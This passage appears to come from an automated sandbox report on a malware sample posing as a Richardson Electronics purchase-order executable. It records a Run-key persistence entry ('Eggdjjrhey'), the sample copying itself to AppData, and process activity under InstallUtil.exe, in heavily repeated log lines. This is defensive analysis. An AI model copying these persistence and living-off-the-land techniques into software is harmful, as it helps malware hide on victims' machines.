                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EggdjjrheyJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EggdjjrheyJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
